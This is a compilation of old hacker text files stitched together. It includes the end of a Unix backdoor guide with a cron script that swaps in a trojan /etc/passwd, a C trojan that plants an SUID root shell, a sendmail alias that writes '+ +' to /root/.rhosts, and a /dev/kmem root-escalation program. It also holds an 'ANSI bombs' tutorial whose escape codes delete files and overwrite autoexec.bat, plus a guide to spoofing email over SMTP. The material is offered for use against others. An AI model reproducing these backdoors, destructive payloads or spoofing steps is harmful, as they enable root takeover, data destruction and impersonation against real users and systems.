/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:


        29      2       *       *       *       /bin/usr/sneakysneaky_passwd

make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky

and this is the simple shell script:

#!/bin/csh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com

cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd

[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.

/* A little trojan to create an SUID root shell, if the proper argument is
given.  C code, rather than shell to hide obvious it's effects. */
/* daemon9@netcom.com */

#include

#define KEYWORD "industry3"
#define BUFFERSIZE 10  

int main(argc, argv)
int argc;
char *argv[];{

        int i=0;

        if(argv[1]){            /* we've got an argument, is it the keyword? */

                if(!(strcmp(KEYWORD,argv[1]))){
                       
                                /* This is the trojan part. */
                        system("cp /bin/csh /bin/.swp121");
                        system("chown root /bin/.swp121");
                        system("chmod 4755 /bin/.swp121");
                }
        }
                                /* Put your possibly system specific trojan
                                   messages here */
                                /* Let's look like we're doing something... */
        printf("Sychronizing bitmap image records.");
        /* system("ls -alR / >& /dev/null > /dev/null&"); */
        for(;i<10;i++){
                fprintf(stderr,".");           
                sleep(1);
        }
        printf("\nDone.\n");
        return(0);
} /* End main */

[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:

 "decode: "|/usr/bin/uudecode"

to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.

#! /bin/csh

# Create our .rhosts file.  Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com

You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.



The Covert

[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.



The Esoteric

[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.

/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0.  */
/* This code originally appeared in "UNIX security:  A practical tutorial"
with some modifications by daemon9@netcom.com */

#include
#include
#include
#include
#include
#include
#include

#define KEYWORD "nomenclature1"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{

        int count, fd;
        long where, lseek();
       
        if(argv[1]){            /* we've got an argument, is it the keyword? */
                if(!(strcmp(KEYWORD,argv[1]))){
                        fd=(open("/dev/kmem",O_RDWR);

                        if(fd<0){
                                printf("Cannot read or write to /dev/kmem\n");
                                perror(argv);
                                exit(10);      
                        }
                               
                        userlocation=address();
                        where=(lseek(fd,userlocation,0);
       
                        if(where!=userlocation){
                                printf("Cannot seek to user page\n");
                                perror(argv);
                                exit(20);
                        }

                        count=read(fd,&userpage,sizeof(struct user));
       
                        if(count!=sizeof(struct user)){
                                printf("Cannot read user page\n");
                                perror(argv);
                                exit(30);
                        }      

                        printf("Current UID: %d\n",userpage.u_ruid);
                        printf("Current GID: %d\n",userpage.g_ruid);
                       
                        userpage.u_ruid=0;
                        userpage.u_rgid=0;
                       
                        where=lseek(fd,userlocation,0);

                        if(where!=userlocation){       
                                printf("Cannot seek to user page\n");
                                perror(argv);
                                exit(40);
                        }
                       
                        write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
                       
                        execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
                }
        }

} /* End main */

#include
#include
#include

#define LNULL ((LDFILE *)0)

long address(){
       
        LDFILE *object;
        SYMENT symbol;
        long idx=0;

        object=ldopen("/unix",LNULL);

        if(!object){
                fprintf(stderr,"Cannot open /unix.\n");
                exit(50);
        }

        for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
                if(!strcmp("_u",ldgetname(object,&symbol))){
                        fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
                        ldclose(object);
                        return(symbol.n_value);
                }
        }

        fprintf(stderr,"Cannot read symbol table in /unix.\n");
        exit(60);
}

[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:

chmod 666 /dev/kmem
sleep 300               # Nap for 5 minutes
chmod 600 /dev/kmem     # Or whatever it was before



From The Infinity Concept Issue II

anti leech hacking tutorial

I was just asking to know if there is some audiance before
here is my method
for hacking anti leech
we gona use a soft calde proxo mitron
proxomitron is an anti bull script web proxy it' works buy applying some rules to elliuminte pop up and many other thing but for our cas we need to desactive all this filtring first goto
w-w.proxomitron.info
download a copy of the soft
then you need to unselect all the option of the soft
and clik on log window
no go to a anti leech web site
use the plug in and not netpumper
in the plugin
add a proxy
you must put this proxy adress
127.0.0.1 8080 for http
the same for ftp
now select the file to download a click download
watch in proximitron log winodws you will see many internal forwarding
if the file are located in a ftp server
proximitron dont handel them
and you will find an error
in a ftp adress
if it's a http adress
you will find some thing like
get /blablalma/bla/file
site tr.com
and you have foudn the adress
it' tr.com/blabla/file

ANSIBombs II Tips And Techniques

                  ANSI Bombs II: Tips and Techniques

                                  By

                           The Raging Golem


    I. Introduction

    After writing the last file, a lot of people let me know about the
mistakes I had made.  I guess this file is to clear up those miscon
ceptions and to let people know about some of the little tricks behind
ANSI bombing.  Of course, ANSI bombing isn't as dangerous as a lot of
people make it out to be, but bombs are still fun to make and with a
little planning deliver some degree of success.  ANSI bombing can
be dangerous, so I am tired of hearing people say that an ANSI bomb is
harmless, another misconception I hope to clear up.  Now, most people
that have spent time experimenting with ANSI bombs probably know most
of the material in this file, but it might be fun just to read anyway.

    2. Misconceptions

    In my last file, I made three major blunders, or what I would con
sider to be major blunders.  First, I said that ANSI bombs could be
used on BBSs to screw people over, but I guess I was wrong.  It was
pure speculation on what other people had said that made me say that.
ANSI codes, including those that redefine keys, are sent over the
lines, but most comm programs don't use ANSI.SYS; they use their own
version of ANSI, which doesn't support key redefinition.  Some people
might have a program that supports it, but I haven't seen it yet.  I
have tested bombs on systems on my own and proved to myself that they
don't work.  I have also seen people fuck up bombs that would have
worked by uploading them in a message.  The second misconception is
that ANSI bombs are dangerous when put into zips.  I haven't really
tested this out much, but from what I hear with the newer versions of
PKZIP, you have to specify that you want to see ANSI comments when
unzipping.  It is unlikely that you would waste your time unzipping
something again after seeing "Format C:" in the middle of an escape
code.  I could be mistaken, but I'm pretty sure that I'm right. Third,
the last thing that was a misconception is that VANSI.SYS will protect
your system from key redefinition.  Maybe the newer versions don't
support key redefinition, but mine sure as hell does.  There are pro
grams out there that don't support it, but I don't know any of the
names.  Of course, if I were you, I would be wary about using some
thing other then ANSI.  I have a few friends that are working on "A
Better ANSI" for PDers, which, instead of being better, really screws
them over.

    3. An Overview

    Now, in case you haven't read my other file (it's called ANSI.DOC,
kind of lame but fairly informative), I'll briefly go over the struc
ture of an ANSI bomb.  Skip this part if you know what an ANSI bomb is
and how to make one.
    In ANSI everything is done with a system of escape codes.  Key
redefinition is one of those codes.  (From now, whenever I say ESC, I
really mean the arrow, ).  Here is a basic command:
                          ESC [13;27p
    This would make the <Enter> key (13 is the code for enter) turn
into the <Escape> key (27 is the code for escape).  The  always has to
be there, as do the bracket and the "p", but what is between the
bracket and the "p" is up to you.  The first number is always the key
that you want to be redefined.  If there is a zero for the first num
ber, that means the key is in the extended set, and therefore, the
first two numbers are the code.  The bracket signifies the beginning
of the definition, and the "p" signifies the end.  Whenever you want a
key pressed, you have to use it's numerical code (i.e. 13 is the code
for <Enter>).  You can't redefine strings, but you can redefine a key
to become a string (i.e. ESC [13;"Blah"p would make <Enter> say
"Blah").  Strings must be inside of quotes, which includes commands
that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p
would delete everything in the directory, note that 13 stands for
Enter in this case, not the redefinition).  An escape code can have
as many commands as you want in it, but each one has to be separated
by a semi-colon.  You can only redefine one key in each escape code,
so if you want to redefine another key, you have to start another
escape code.  That's about it when it comes to bombs, now that you
have the basics, all you really need is a little imagination.

    4. Tips and Tricks

    A. The Y/N Redefinition

    Now, here's a simple but fun little ANSI bomb:

                   ESC [78;89;13p ESC [110;121;13p

    Basically, all this does is turn a capital "N" into "Y" and a
lower-case "n" into "y".  Alone this doesn't do too much, except for
screw around with what they are typing.  On the other hand, try adding
this line of code to the ANSI bomb:

                   ESC [13;27;13;"del *.*";13p

    Most people would automatically press "N" when they see "Del *.*",
but when they do, they will be screwed over.  This portion of a bomb
is very useful when it comes to making good bombs.

    B. Screwing with the Autoexec.bat

    Here is another line of code that you may find useful in future
bombing projects:

                   ESC [13;27;13;"copy bomb.ans c:\";13;"copy con
                     c:\autoexec.bat";13;"type bomb.ans";13;0;109;
                     13;"cls";13p

    This line of code makes the bomb a little more permanent and a
little more dangerous.  It copies the bomb into the root directory,
then it change/creates the autoexec.bat, so the bomb is typed after
every boot-up.  Of course, the person could just boot off a disk, but
I'm sure this would get them a few time.  It could also probably
appear as though it were a virus, scaring the shit out of the owner of
the computer.

    C. Turning Commands into Other Commands

    One of the best pranks to do to someone using an ANSI bomb is to
redefine commands.  That way if they type in "copy", it will turn into
"Del *.*".  Since you can't actually change the whole string, you have
to take a different approach.  You have to change a few of the keys,
so when typed, they type and execute the desired command.  I guess it
would be coolest to have to command exactly the same length; that way
you could redefine one key at a time to obtain the desired effect.
It doesn't really matter how you do it, just as long as it works.  You
might make an ANSI that says "Wow, check out what this bomb did to
your directory", and then have it redefine the keys, so when they type
in "dir", it turns into "del".  I think you get the idea.

    D. Trojans

    By now, everybody knows what a Trojan is.  You probably wouldn't
think so, but ANSI bombs can be used as Trojans and in Trojans. First,
if you are planning on crashing a board, but you're not very good at
programming, then make yourself an ANSI bomb.  Try to find out in
which directory the main files for running the BBS are stored. They
are usually under the name BBS or the name of the software, like WWIV
or Telegard.  Then, make a bomb that either just deletes all the files
in that directory, or if you want the board to be down a longer time,
then make one that formats the Hard Drive.  In this form ANSI bombs,
if they are well planned out, can be easy to make Trojans. Second,
ANSI bombs can used in Trojans.  This is probably stretching it a
little, but say you wanted to write a Trojan that would delete a
directory, every time you typed a certain key, then you could use an
ANSI bomb.  First make some batch and com/exe files that would search
for protecting programs like Norton and turn them off.  Then you could
copy the file into the root directory, along with your versions of
autoexec.bat, config.sys, ANSI.sys, and whatever else.  (To make it
look more realistic make the files Resource.00x to trick the user,
then when copying, use the real name).  Then somehow lock the computer
up or do a warm boot through some pd program, which is easily attain
able.  When the computer loads back up, you can screw that shit out of
them with your ANSI bomb.

    5. Conclusion
    It would seem to some people that ANSI bombs are very dangerous,
and to others that they are stupid or lame.  Personally, I think that
ANSI bombs are just plain old fun.  They're not too hard to make, but
there is a lot that you can do with them.  They are nowhere near as
malicious as virii, so if you're looking for unstoppable destruction,
look elsewhere, but they do serve their purpose.  I know that there
are programs out there that help you program ANSI bombs, but I think
that they kind of take the fun out of them.  Probably, some day soon,
I'll quit making ANSI bombs and start looking more into virii and pure
Trojans.  But for now, ANSI bombs suit my purpose.

                               -TRG

    Appendix A: Key Code Program

    Here is a small program, which I find very helpful.  After loading
it up, it tells you the numeric code for every key you type in.  Spe
cial means that it is in the extended set and therefore uses zero, and
"q" ends the program.  Unfortunately,  I can't take any credit for
this program.  I got it over the phone from Heavymetl, and it was made
by his brother.  So many thanks go out to Heavymetl and his brother,
even though they'll probably be a little pissed at me for including
this in my file.  It is in Pascal and can be compiled in most Turbo
Pascal compilers.

    Use CRT;
    Var
      CH : CHAR;
    Begin
      Repeat
        CH := ReadKey;
        If CH = #0 then
          Begin
            CH := ReadKey;
            WriteLn(CH,'(Special) - ',ORD(CH));
          End
        Else
          WriteLn(CH,' - ',ORD(CH));
      Until
        CH = 'q';
    End.

    Thanks go out to:

    Heavymetl and his brother for the program and ideas.  Weapons
Master for the input and the help he has given me.  Everybody else who
has helped me out; you know who you are, or at least, you think you
know who you are.  Most of all, to those brave soldiers risking their
asses everyday for us half-way across the world in Saudi Arabia.  Your
deeds haven't gone unnoticed, of course that's mainly because that's
all the news ever shows nowadays.  Also, to anybody else I might have
forgotten.  Thanks.

ANONYMOUS emails

Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.

 I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

then you put:

mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again

Example:
mail from:<askbill@microsoft.com.net>

You hit enter and then you put:

rcpt to:<lamer@lamer'sworld.com>
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is  for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you.  If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com"  insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.